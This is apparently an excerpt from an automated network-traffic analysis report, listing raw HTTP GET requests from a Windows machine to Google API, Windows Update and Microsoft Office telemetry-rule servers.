Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B9aATLYBnkH1xut&MD=NBebN5mO HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B9aATLYBnkH1xut&MD=NBebN5mO HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
